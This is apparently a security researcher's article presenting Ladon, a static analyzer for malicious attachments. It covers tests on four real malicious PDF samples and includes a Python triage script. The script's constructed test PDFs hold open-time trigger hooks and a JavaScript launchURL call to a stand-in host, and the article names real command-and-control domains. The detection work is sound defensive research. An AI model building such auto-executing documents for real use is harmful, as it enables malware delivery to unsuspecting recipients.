The Attachment Is the Blind Spot
The executive has a flight tomorrow. Their assistant is coordinating — the calendar, the hotel confirmation, the travel itinerary. A PDF arrives from what looks like the airline: a boarding pass, an e-ticket update, a gate change. The assistant opens it. Nothing visible happens. But somewhere between the travel agency, the booking platform, and the inbox, someone intercepted that file and replaced the QR code with one that points somewhere else entirely. Or embedded a tracking pixel that phoned home the moment the document rendered, leaking the executive's corporate email, device fingerprint, and exact timestamp to an attacker who now knows the travel schedule, the destination, and that someone just opened a document on the corporate network.
The assistant is not careless. They are doing exactly what they were hired to do. The file looked right. The sender looked right. Nobody told them what to look for inside the attachment — because until now, there was no tool that made that check possible for a non-technical person.
A subcontractor at a defense firm gets a PDF. It's an invoice from a vendor they've worked with before. The email passes their spam filter. The attachment passes their antivirus scan. They open it. Nothing visible happens. But the moment that PDF renders in their reader, it phones home — leaking their IP address, operating system, and an exact timestamp to whoever sent it. And that's the benign version of the story.
The more dangerous version: the PDF carries an embedded Windows executable deep in the file body, around 36,700 bytes in, well past the header region that a type check reading only the first bytes ever sees, wrapped in a file structure that looks completely legitimate. A PDF reader will not run a raw PE blob by itself; the payload sits dormant until a user is talked into extracting or launching it, or until an action wired to the document's open event (an /OpenAction entry in the catalog, or an /AA additional-actions dictionary on a page or form field) fires the moment the document opens and hands it off. The employee never knew. The antivirus never flagged it. The email security platform analyzed the email. Nobody analyzed what was inside the attachment.
This is the gap that Ladon was built to close.
The pattern keeps showing up: In my analysis of the TeamPCP supply chain attack — The Trusted Channel — the final payload was hidden inside WAV audio files fetched live from a command-and-control server, extracted in memory, and executed silently. No executable written to disk. No recognizable file. The same principle applies to documents: the threat is never where you think to look. It is always inside something that is trusted by default.
Email security platforms do excellent work analyzing the email envelope — headers, sender reputation, link analysis. The attachment is treated as a black box. A PDF that passes basic type-checking gets delivered. What lives inside that PDF — auto-executing JavaScript, a tracking pixel, a QR code pointing to a typosquatted domain, an embedded executable — is rarely analyzed at the point of delivery. That is not a gap in a specific product. It is a structural gap in how document security is approached across the industry.
The Idea Came From Reading
The idea did not start with a tool. It started with reading.
I read threat intelligence the way some people read the news — continuously, as a habit built from genuine curiosity about how attacks work and why defenses fail. When a new attack surfaces, my brain doesn't stop at "that's interesting." It immediately asks three questions: how did this happen, why did existing defenses miss it, and what would it take to prevent it.
The pattern that led to Ladon was not a single attack — it was the accumulation of several. Supply chain attacks embedding malware in WAV audio files. Boarding pass QR codes replaced with credential harvesting links. Calendar invites bypassing email security filters entirely because .ics files are auto-added to Outlook and Google Calendar regardless of whether the original email was quarantined. PDF tracking pixels that phone home the moment a document is opened, leaking the recipient's IP address, operating system, and exact timestamp before they read a single word.
Each of these attack vectors shared something in common — they exploited the implicit trust users place in documents that look legitimate. A boarding pass is a boarding pass. A calendar invite from IT is from IT. A PDF invoice from a vendor is from a vendor. The malicious content is invisible to the eye and, critically, invisible to most security tools that analyze the email itself rather than what is embedded inside the attachments.
The question that crystallized the idea was simple: what if anyone could drag and drop a suspicious attachment into a tool and get a plain-English explanation of exactly what is suspicious about it and why it matters — before opening it? Not a cryptic hash match or a vendor confidence score, but a real explanation that teaches the user something about how the attack works.
That question became Ladon.
On the name: In Greek mythology, Ladon was the hundred-headed serpent that never slept, assigned by Hera to guard the golden apples in the Garden of the Hesperides. It watched every angle simultaneously, never rested, and never missed a threat. The metaphor felt right for a tool designed to examine every attack surface in a document at once — PDF structure, embedded images, audio steganography, barcodes, calendar links — not just one thing, but all of them, simultaneously.
What Ladon Does, in Plain English
Ladon is a static document security analyzer. You drag in a file — a PDF, an email, an image, a calendar invite, an audio file — and it tells you what's suspicious about it before you open it. It supports PDF, EML, ICS, JPG, PNG, GIF, BMP, WEBP, ICO, SVG, WAV, and MP3.
The word static is doing real work in that description. Ladon never executes the file. It reads the raw bytes and analyzes their structure, the same way a forensic investigator examines evidence without touching it. Nothing renders the document, runs its JavaScript, or follows its links, so the payload is never interpreted as a document; it is just data. This is not a minor technical detail. It is the core security guarantee that makes the tool safe to use on genuinely malicious files. The one attack surface that remains is the analyzer's own parsing code: a deliberately malformed PDF or image can still target bugs in whatever reads it, so triage of unknown samples still belongs in an isolated environment, whatever tool performs it.
The educational layer was intentional from the start. Security awareness training teaches people to be suspicious of unexpected attachments. It rarely explains the mechanics — what a tracking pixel actually does, why a QR code in a boarding pass can be dangerous, how data can be hidden in an image that looks completely normal. Every Ladon finding comes with a plain-English explanation of the technique, why it matters, and what an attacker gains from it.
Four Real Samples. Zero Misses.
Synthetic test files built to fire detection rules are a starting point — they prove the code runs, not that the tool works. Real validation requires real malware. On April 3, 2026, after installing a FlareVM malware analysis environment in an isolated Windows 11 virtual machine with Windows Defender disabled, I downloaded four confirmed malicious PDF samples from MalwareBazaar and uploaded each one to Ladon.
All four were detected. No false negatives. No crashes. No execution.
| Sample | Family / Origin | Severity | Key Findings |
|---|---|---|---|
| Unknown PDF dropper · d67e62bb... · 293 KB | Unknown · MalwareBazaar 2026-03-31 | HIGH | Polyglot: Windows PE signature inside PDF · /ObjStm stream (object hiding) |
| Shui Wu Chou Cha She Shui Qi Ye Ming Dan · e2b75baeb... · 158 KB | ValleyRAT / SilverFox · Chinese APT · 2026-03-13 | CRITICAL | Polyglot: PE signature inside PDF · 20× external URI · 13 suspicious URLs · Live C2 — cos.ap-guangzhou.myqcloud.com |
| Facebook Account Recovery Support Center 2026 · b046d04b... · 135 KB | Phishing · Social engineering · 2026-01-09 | CRITICAL | Polyglot: PE signature inside PDF · Auto-execute on open (6×) · 4× external URI · C2 — maneger-accountr-solutieonst.site |
| consider(15).pdf · 5095c647... · 155 KB | Gamaredon APT · Russian state-affiliated · 2025-11-24 | HIGH | Polyglot: PE signature inside PDF · VBA macro content · PDF structure otherwise clean (sophisticated evasion) |
The Findings, One by One
Every sample was a polyglot
All four samples contained a Windows PE executable embedded in the PDF file body, far past the header. This is not a coincidence. Burying an executable inside a valid-looking document is a deliberate evasion technique: a tool that identifies a file by its first few bytes sees a valid PDF header and stops. Ladon reads the entire file, and an MZ header whose e_lfanew field points at a PE signature is the same sequence of bytes wherever in the file it sits.
ValleyRAT: a live C2 URL baked into the PDF structure
The ValleyRAT sample, delivered with a Chinese-language filename targeting Chinese-speaking businesses, embedded 20 external URI references and 13 suspicious URLs pointing to Chinese cloud infrastructure being abused as command-and-control. How those references fire depends on how they are wired into the document: a /URI action behind a link annotation needs a click, while one reached from an /OpenAction or page-level /AA entry fires as the document renders, with no user click required. Either way, the reader resolving the URL is what delivers the secondary payload. The repetition of the same C2 domain across thirteen URLs is itself a ValleyRAT technique: embed enough copies that at least one resolves even if some are taken down.
The Facebook phishing PDF: auto-execute on open
The most technically aggressive sample was disguised as a Facebook account recovery notice. Beyond the embedded executable, Ladon detected six auto-execute actions, a PDF capability that fires an action the moment the document opens. No macro to enable. No button to click. Simply opening the file in a PDF reader is enough to request execution. This is the attack that ends careers and fails CMMC audits: an employee receives what looks like an official communication, opens it following normal procedure, and the payload runs before they finish reading the first sentence.
Auto-execute in practice: the PDF specification has legitimate hooks for running an action when a document opens, the /OpenAction entry in the catalog and the /AA additional-actions dictionaries on pages and form fields, intended for setting the initial view, initializing forms, and similar uses. Attackers point those same hooks at /JavaScript, /Launch, or /URI actions so that opening the file is the trigger. Whether the action then actually runs depends on the reader; modern readers sandbox JavaScript and prompt before a /Launch or an external URI. The finding stands regardless, because the document is asking for execution before the user has done anything.
Gamaredon: sophisticated evasion, still caught
The most interesting result was the Gamaredon sample. Gamaredon — also known as Primitive Bear, Shuckworm, or Aqua Blizzard — is a Russian FSB-attributed APT group active since at least 2013, primarily targeting Ukrainian government and military institutions with documented expansion toward NATO-aligned organizations. The security community has long debated how to characterize them: ESET describes them as "known for their unsophisticated and noisy approach" — yet ESET's own July 2025 research shows the group has notably adapted, with new tools designed primarily for stealth. HarfangLab notes they are as active as ever but receive little in-depth coverage, with their ability to consistently evade detection making them a persistent threat.
What Ladon's result adds to that debate: the sophistication question is the wrong frame. Their sample was deliberately constructed to be clean at the PDF structure layer — no auto-execute flags, no hidden object streams, no external URI references. A tool that stopped at document structure analysis would have cleared this file as safe. Ladon caught it anyway, because polyglot detection does not depend on what the document structure claims. It reads the entire file independently. The embedded executable cannot hide from that check regardless of how clean the wrapper looks — or how the security community classifies the group that built it.
That is the architectural decision that matters. Defense in depth at the file level, not just at one layer.
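The checks described in the four findings above (a PE header anywhere in the file, the /OpenAction and /AA open-time hooks, /JavaScript and /Launch actions, repeated external /URI targets, /ObjStm object streams) fit in a short static pass over raw bytes. The block below is an added example written for this article; it is not Ladon's code and does not claim to reproduce Ladon's rules. The sample PDFs, the hostnames in them, and the severity labels are constructed assumptions for the demonstration. It also handles one detail a naive substring search misses: PDF names may be written with hex escapes, so /Open#41ction is a perfectly valid spelling of /OpenAction.

```python
"""Static PDF triage over raw bytes: the file is read as data, never rendered.

Added example for this article, not Ladon's own code. It implements the checks
the findings above describe: an MZ/PE header anywhere in the file (polyglot),
open-time triggers (/OpenAction, /AA), /JavaScript, /Launch and /EmbeddedFile,
external /URI targets, and /ObjStm object streams. The sample PDFs, the
example hostnames and the severity labels are constructed assumptions.
"""
import re
from collections import Counter

SEVERITY_RANK = {"MEDIUM": 1, "HIGH": 2, "CRITICAL": 3}

# PDF name tokens worth a finding (names per PDF 32000-1:2008) and the
# severity each earns on its own. Polyglot and URI findings are added below.
TRIGGER_KEYS = {
    b"/OpenAction":   ("CRITICAL", "action runs the moment the document opens"),
    b"/AA":           ("CRITICAL", "additional-actions dictionary (page open, field events)"),
    b"/JavaScript":   ("CRITICAL", "embedded JavaScript"),
    b"/JS":           ("CRITICAL", "JavaScript action"),
    b"/Launch":       ("CRITICAL", "launches an external program or file"),
    b"/EmbeddedFile": ("HIGH",     "file attachment stream"),
    b"/ObjStm":       ("MEDIUM",   "object stream (objects hidden in a compressed stream)"),
}


def unescape_names(data: bytes) -> bytes:
    """Undo #xx hex escapes so an obfuscated /Open#41ction reads as /OpenAction."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)


def find_pe(data: bytes):
    """Offset of an MZ header whose e_lfanew points at 'PE\\0\\0', or None.
    Scans the whole buffer, so an executable after %%EOF is found regardless
    of how clean the PDF structure looks."""
    for m in re.finditer(rb"MZ", data):
        off = m.start()
        if off + 0x40 > len(data):
            break
        e_lfanew = int.from_bytes(data[off + 0x3C:off + 0x40], "little")
        pe = off + e_lfanew
        if 0 < e_lfanew < 0x1000 and data[pe:pe + 4] == b"PE\x00\x00":
            return off
    return None


def triage_pdf(raw: bytes) -> dict:
    """Return {'severity', 'findings': [(severity, message)], 'pe_offset'}."""
    data = unescape_names(raw)          # name checks run on de-obfuscated bytes
    pe_off = find_pe(raw)               # offsets are reported against the real file
    findings = []
    if not data.startswith(b"%PDF-"):
        findings.append(("HIGH", "no %PDF- header at offset 0"))
    if pe_off is not None:
        findings.append(("CRITICAL", f"polyglot: Windows PE header at offset {pe_off}"))
    for key, (sev, why) in TRIGGER_KEYS.items():
        # The name must end at a delimiter, so /JS does not match /JSx.
        n = len(re.findall(re.escape(key) + rb"(?![A-Za-z0-9_])", data))
        if n:
            findings.append((sev, f"{key.decode()} x{n}: {why}"))
    uris = re.findall(rb"/URI\s*\(([^)]*)\)", data)
    hosts = Counter(re.sub(rb"^[a-z]+://", b"", u).split(b"/")[0].decode("latin-1")
                    for u in uris)
    for host, n in hosts.items():
        # Many references to one host is the pattern the ValleyRAT sample showed.
        findings.append(("HIGH" if n > 1 else "MEDIUM", f"external URI -> {host} x{n}"))
    top = max((SEVERITY_RANK[s] for s, _ in findings), default=0)
    severity = {0: "CLEAN", 1: "MEDIUM", 2: "HIGH", 3: "CRITICAL"}[top]
    return {"severity": severity, "findings": findings, "pe_offset": pe_off}


# --- Constructed samples (not real malware) ----------------------------------
CLEAN_PDF = (b"%PDF-1.4\n"
             b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
             b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
             b"3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj\n"
             b"trailer << /Root 1 0 R >>\n%%EOF\n")

# Minimal MZ stub whose e_lfanew (at 0x3C) points at a PE\0\0 signature.
PE_STUB = bytearray(b"MZ" + b"\x00" * 0x3E)
PE_STUB[0x3C:0x40] = (0x40).to_bytes(4, "little")
PE_STUB += b"PE\x00\x00"

# Clean wrapper with an executable after %%EOF: the Gamaredon pattern above.
CLEAN_WRAPPER_WITH_PE = CLEAN_PDF + bytes(PE_STUB)

# Everything at once: hex-escaped /OpenAction, page-level /AA, JavaScript,
# repeated /URI links to one host, an object stream, and the trailing PE.
LOADED_PDF = (
    b"%PDF-1.7\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /Open#41ction 4 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /AA << /O 4 0 R >> "
    b"/Annots [6 0 R 7 0 R 8 0 R] >> endobj\n"
    b'4 0 obj << /S /JavaScript /JS (app.launchURL("http://cdn-update.example/s2")) >> endobj\n'
    b"5 0 obj << /Type /ObjStm /N 1 /First 8 >> stream\n9 0 << >>\nendstream endobj\n"
    b"6 0 obj << /Subtype /Link /A << /S /URI /URI (http://cdn-update.example/a) >> >> endobj\n"
    b"7 0 obj << /Subtype /Link /A << /S /URI /URI (http://cdn-update.example/b) >> >> endobj\n"
    b"8 0 obj << /Subtype /Link /A << /S /URI /URI (https://track.example/p.gif) >> >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
) + bytes(PE_STUB)
```

Running `triage_pdf(CLEAN_WRAPPER_WITH_PE)` returns severity CRITICAL with the polyglot line as the only finding: that is the Gamaredon case, a structurally clean wrapper that still fails the whole-file check. `triage_pdf(LOADED_PDF)` reports the hex-escaped /OpenAction, the page /AA, both JavaScript names, the object stream, two links to one host and one to another, plus the same trailing PE. The PE search runs on the original bytes rather than the de-escaped copy so that the reported offset matches the file on disk.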
The Contractor Who Opens the PDF
Defense contractors are not the primary target of most of these campaigns. They are a target of opportunity — organizations that handle Controlled Unclassified Information, that often lack dedicated security teams, and that receive documents from dozens of vendors, subcontractors, and government offices every day. The attack surface is the inbox. The vector is the PDF.
The ValleyRAT and Gamaredon families both have documented histories targeting organizations connected to defense supply chains. Gamaredon has been active since at least 2013, attributed to Russia's Federal Security Service, and has been observed specifically targeting defense industrial organizations in Eastern Europe and NATO member states. A contractor in Connecticut receiving a PDF from an unfamiliar sender is not paranoid to be cautious. They are operating in an environment where nation-state actors have explicitly demonstrated interest in exactly that attack vector.
The CMMC context: Phase 1 enforcement has been active since November 10, 2025. Phase 2 mandatory third-party certification begins November 2026. Only 1% of contractors are currently audit-ready — down from 8% in 2023. There are 350,000 contractors requiring certification and only 600 certified assessors. In that environment, a single successful document-based attack that results in a data breach is not just a security incident. It is a contract-ending event. [Full CMMC Supply Chain Analysis →]
Ladon is not a replacement for endpoint security or email gateways. It is the triage layer that exists before those tools are relevant, the thing you use when a file arrives and you need to know, before you open it, whether it is safe. For a CMMC-compliant organization, having a documented triage process for suspicious attachments is not just good hygiene. It maps directly to control requirements. (The identifiers below are CMMC 1.0 practice numbers; CMMC 2.0 keeps the same requirements but labels them by their NIST SP 800-171 source, for example SI.L1-3.14.1 for flaw remediation.)
SI.1.210 Flaw remediation. Identify, report, and correct information and information system flaws in a timely manner, including flaws introduced through malicious attachments. Static triage analysis before opening a file supports this practice, and even more directly its neighbour SI.1.211, protection from malicious code at appropriate locations within the system.
SI.2.214 Security alerts and advisories. Monitor system security alerts and take action in response to malicious code. Ladon's plain-English findings give non-technical employees actionable, documented evidence to escalate.
AT.2.056 Security awareness training. Ensure personnel are aware of security risks associated with their activities. Using Ladon in a facilitated session, running real suspicious files and explaining the findings, creates a documented, role-relevant training record that supports this control.
SC.1.175 Boundary protection. Monitor, control, and protect communications at external boundaries. Document triage is a boundary protection activity — analyzing what crosses the perimeter before it is introduced into the environment.
The Tool Is the Proof of Concept
Ladon is a portfolio piece today. The goal is for it to become infrastructure.
The manual triage workflow — drag a file, get a plain-English report — is the starting point. April 3, 2026 proved it works on real malware from real threat actors. The methodology is validated. What comes next is a larger problem: the gap is not just in manual triage, it is in the moment before an employee ever sees the file. That is the problem worth solving.
For CMMC-compliant defense contractors specifically, a pre-delivery document scanner that produces structured findings, maps to NIST controls, and generates audit-ready logs addresses a compliance gap that no existing consumer-grade tool fills. The market exists. The methodology is validated. The next step is the integration layer.
Currently in private testing. Ladon is being validated with real malware samples before public release. If you are a defense contractor, CMMC consultant, or security team lead interested in early access or want to discuss how document triage fits into your compliance workflow, reach out via the portfolio.
The detection methodology that powers Ladon builds on the same analytical foundation as my other published work — including the Glassworm homoglyph detection rule submitted to Sublime Security's community rule feed. Each piece of work is a layer in the same argument: the threats are in the details nobody is checking, and the tools to check them can be built.
Sources
| Source | Relevance | Link |
|---|---|---|
| MalwareBazaar — abuse.ch | All four malware samples used in validation | bazaar.abuse.ch |
| MITRE ATT&CK — Gamaredon | Russian FSB-attributed APT · Active since 2013 · NATO targeting | attack.mitre.org/groups/G0047 |
| TeamPCP / Telnyx Supply Chain Analysis | WAV steganography in supply chain attack — same technique Ladon detects | The Trusted Channel → |
| CMMC Supply Chain Analysis — Yana Ivanov, 2026 | 1% audit-ready · 350K contractors · 600 assessors · 18-month wait times | CMMC Supply Chain Analysis → |
| NIST SP 800-171 Rev 3 | Control mappings — SI.1.210, SI.2.214, AT.2.056, SC.1.175 | csrc.nist.gov |
| DoD CIO — CMMC Program | Phase 1 enforcement active November 10, 2025 · Phase 2 begins November 2026 | dodcio.defense.gov/CMMC |
| Sublime Security — PR #4267 | Glassworm invisible Unicode detection rule — community rule feed submission | sublime-rules/pull/4267 |
| Mandiant FlareVM | Malware analysis environment used for isolated testing | github.com/mandiant/flare-vm |
| ESET Research — Gamaredon 2024 White Paper | "Known for unsophisticated and noisy approach" — yet evolving stealth capabilities | eset.com · July 2025 |
| HarfangLab — Cyber Threat Research 2025 | Gamaredon active as ever, little in-depth coverage, consistently evades detection | harfanglab.io · December 2025 |